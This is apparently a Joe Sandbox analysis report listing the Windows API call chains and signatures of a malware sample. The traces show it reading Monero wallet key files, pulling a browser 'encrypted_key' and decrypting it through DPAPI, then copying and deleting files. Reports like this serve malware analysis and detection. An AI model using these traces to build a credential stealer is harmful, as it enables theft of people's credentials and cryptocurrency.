                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 09828a3a0f5aa04ec11856aa725ed5508283c436fe8a396d15afff191ff55824
                          • Instruction ID: c052da26fa53af618c21224f1750a5059731ff1fdd5542f2d04132793114876f
                          • Opcode Fuzzy Hash: 09828a3a0f5aa04ec11856aa725ed5508283c436fe8a396d15afff191ff55824
                          • Instruction Fuzzy Hash: 4AE1EE729102089BDB05FBA4DD96EEE7338AF24300F548269F517720D1EF346A4DEB62
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFD481
                          • lstrlen.KERNEL32(00000000), ref: 00BFD698
                          • lstrlen.KERNEL32(00000000), ref: 00BFD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 70da16c57a73d8da1cbe1ea60ded7f406442e6990bafcca6848504f05d931850
                          • Instruction ID: 5f9d43623d0b2e0d5de03e2ba5ca51409a4d12c3082a75bc324e746d87a862c7
                          • Opcode Fuzzy Hash: 70da16c57a73d8da1cbe1ea60ded7f406442e6990bafcca6848504f05d931850
                          • Instruction Fuzzy Hash: D39101729102089BDB04FBA5DD96EEE7338AF14300F548269F517B60D1EF346A4DEB62
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFD801
                          • lstrlen.KERNEL32(00000000), ref: 00BFD99F
                          • lstrlen.KERNEL32(00000000), ref: 00BFD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: aad277ee846435e107a157d96ee5a8a43a9fc5b93de3be969eb4afae3d18321f
                          • Instruction ID: b9ed3510a95869b46f3114db9c1025b4c43d6a9c69cc32786792069c68eaa766
                          • Opcode Fuzzy Hash: aad277ee846435e107a157d96ee5a8a43a9fc5b93de3be969eb4afae3d18321f
                          • Instruction Fuzzy Hash: FD8123729102089BDB04FBA5DD96EEE7338AF54300F548529F507B60D1EF346A4DEB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: f29838574a626b2ae2800bf7723bdb2dd29cd363f9173b6d5ca611adffcd7d3a
                          • Instruction ID: 9aa8bba740e76623c980e72f30719480308dac244735d12ecb300a054a261346
                          • Opcode Fuzzy Hash: f29838574a626b2ae2800bf7723bdb2dd29cd363f9173b6d5ca611adffcd7d3a
                          • Instruction Fuzzy Hash: CA413F71D10209AFCB04EFE5D849AFEB778BB44304F108128F516762D0DB759A4ADFA1
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00BF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                            • Part of subcall function 00BF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                            • Part of subcall function 00BF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                            • Part of subcall function 00BF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                            • Part of subcall function 00BF99C0: LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                            • Part of subcall function 00BF99C0: CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                            • Part of subcall function 00C08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C08E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BF9D39
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                            • Part of subcall function 00BF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                            • Part of subcall function 00BF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                            • Part of subcall function 00BF9AC0: LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                            • Part of subcall function 00BF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BF9B84
                            • Part of subcall function 00BF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BF9BA3
                            • Part of subcall function 00BF9B60: LocalFree.KERNEL32(?), ref: 00BF9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: b64f31733fe866c0bb29616f0fc9635a9d1f296581ccecac536a53178fffcf71
                          • Instruction ID: 678f4d748152d5d169223874f8273a8c2cc25ed1911f55b11de7cc2694a71f5c
                          • Opcode Fuzzy Hash: b64f31733fe866c0bb29616f0fc9635a9d1f296581ccecac536a53178fffcf71
                          • Instruction Fuzzy Hash: CE3130B5D1020DABCB04EBE4DC85BFEB7B8AB48304F144569EA05A7241E7349A48CBA1
                          APIs
                          • CreateFileA.KERNEL32(00C03AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C03AEE,?), ref: 00C092FC
                          • GetFileSizeEx.KERNEL32(000000FF,00C03AEE), ref: 00C09319
                          • CloseHandle.KERNEL32(000000FF), ref: 00C09327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: a4dec4b95c0660bae757ffabcb71e65a412ad8e13d0a2c1d0f8663554ca4cfbc
                          • Instruction ID: d9c5571e18a71f5675b200588d8186513b493f23d550c8281f989cf502818956
                          • Opcode Fuzzy Hash: a4dec4b95c0660bae757ffabcb71e65a412ad8e13d0a2c1d0f8663554ca4cfbc
                          • Instruction Fuzzy Hash: D0F03C75E44208BBDB10DBB2DC49F9E7BB9EB48710F10C264B651A72D0D6B0A645CF40
                          APIs
                          • __getptd.LIBCMT ref: 00C0C74E
                            • Part of subcall function 00C0BF9F: __amsg_exit.LIBCMT ref: 00C0BFAF
                          • __getptd.LIBCMT ref: 00C0C765
                          • __amsg_exit.LIBCMT ref: 00C0C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00C0C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 00975b6f0fd4411af45f458bbc957e4275da1b0c58eb53df27940fe4e48b4094
                          • Instruction ID: ec7779bc3a069370eddb6bc49a10c829f99eebe393c8f86a00994b9b33bb4a2e
                          • Opcode Fuzzy Hash: 00975b6f0fd4411af45f458bbc957e4275da1b0c58eb53df27940fe4e48b4094
                          • Instruction Fuzzy Hash: 75F09A329443119BD720BBFC9886B8E33A06F00720F208249F424A71D2CB645E41FE56
                          APIs
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04F7A
                          • lstrcat.KERNEL32(?,00C11070), ref: 00C04F97
                          • lstrcat.KERNEL32(?,006E8B90), ref: 00C04FAB
                          • lstrcat.KERNEL32(?,00C11074), ref: 00C04FBD
                            • Part of subcall function 00C04910: wsprintfA.USER32 ref: 00C0492C
                            • Part of subcall function 00C04910: FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                            • Part of subcall function 00C04910: StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                            • Part of subcall function 00C04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                            • Part of subcall function 00C04910: FindClose.KERNEL32(000000FF), ref: 00C04B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: d9d8de6f03ca734d2131886bb9f43b986e9f91addbb822091243fdcd977226a7
                          • Instruction ID: 4437aa22aedf5ac4a6612bd8e951eb068344652f9edf4fad6914a67195956cee
                          • Opcode Fuzzy Hash: d9d8de6f03ca734d2131886bb9f43b986e9f91addbb822091243fdcd977226a7
                          • Instruction Fuzzy Hash: 2E21887690020CABC754FB60DC4AEED377CAB54700F044564B6D9631C1EE7596CCDB92